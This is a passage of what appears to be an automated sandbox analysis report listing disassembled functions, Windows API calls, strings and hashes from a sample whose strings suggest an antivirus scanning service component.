                                                                                        • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                                                        • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                        • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                                                        Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                                                        • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                                                        • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                                                        • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1232609184-0
                                                                                        • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                        • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                                                        • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                        • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                                                        Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                                                        • String ID: H
                                                                                        • API String ID: 2107338056-2852464175
                                                                                        • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                        • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                                                        • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                        • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                                                        Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                                                        • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                                                        • API String ID: 1322048431-2685357988
                                                                                        • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                        • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                                                        • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                        • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                                                        Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                        • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                                                        • API String ID: 2984211723-3002863673
                                                                                        • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                        • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                                                        • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                        • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                                                        Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                                                        • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                                                        • API String ID: 678758403-4129911376
                                                                                        • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                        • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                                                        • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                        • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                                                        Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcesslstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3424473247-0
                                                                                        • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                        • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                                                        • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                        • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                                                        Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                                                        • String ID: bad exception$csm$csm$csm
                                                                                        • API String ID: 3766904988-820278400
                                                                                        • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                        • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                                                        • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                        • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                                                        Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2707001247-0
                                                                                        • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                        • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                                                        • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                        • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                                                        Function 00007FFE1A514804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 849930591-393685449
                                                                                        • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                        • Instruction ID: fd499993ccf6b9c91935bab5288eeea4ce333aaa0ffc7c6b8897070e7816e7d5
                                                                                        • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                        • Instruction Fuzzy Hash: 23D191B2B0CB4186EB609B66D4403BD7BB1FB46BA8F1051B6DA4D57B66DF38E481C700
                                                                                        Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                        • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                                                        • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                        • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                                                        Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                        • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                                                        • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                        • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                                                        Function 00007FFE1A51B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeLibraryProc
                                                                                        • String ID: api-ms-$ext-ms-
                                                                                        • API String ID: 3013587201-537541572
                                                                                        • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                        • Instruction ID: 2bbef90cf95eb59c916a94d88193a724d16daee8ae5a7db9860beb69f51ae72f
                                                                                        • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                        • Instruction Fuzzy Hash: 9A41B165B1DE0291EA168B17A8106BA2392BF06FF0F5A45B7DD0E477A4FE3CE4468340
                                                                                        Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                                                        • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                        • API String ID: 1119674940-1966266597
                                                                                        • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                        • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                                                        • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                        • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                                                        Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                                                        • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                        • API String ID: 3702919091-996641649
                                                                                        • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                        • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                                                        • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                        • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                                                        Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                                                        • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$Info
                                                                                        • String ID:
                                                                                        • API String ID: 1775632426-0
                                                                                        • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                        • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                                                        • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                        • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                                                        Function 00007FFE1A51712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171B1
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171BF
                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171E9
                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A517257
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A517263
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 2559590344-2084034818
                                                                                        • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                        • Instruction ID: 5a141423fb5ada6dbdd1ba32ead31d9645ad61be14c52575c1722e978c5a716d
                                                                                        • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                        • Instruction Fuzzy Hash: 7C31B421B1EE4191EE159B47A4009B92396BF4AFB0F5906F7ED2D07760EF3CE4468700
                                                                                        Function 00007FFE1A519444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
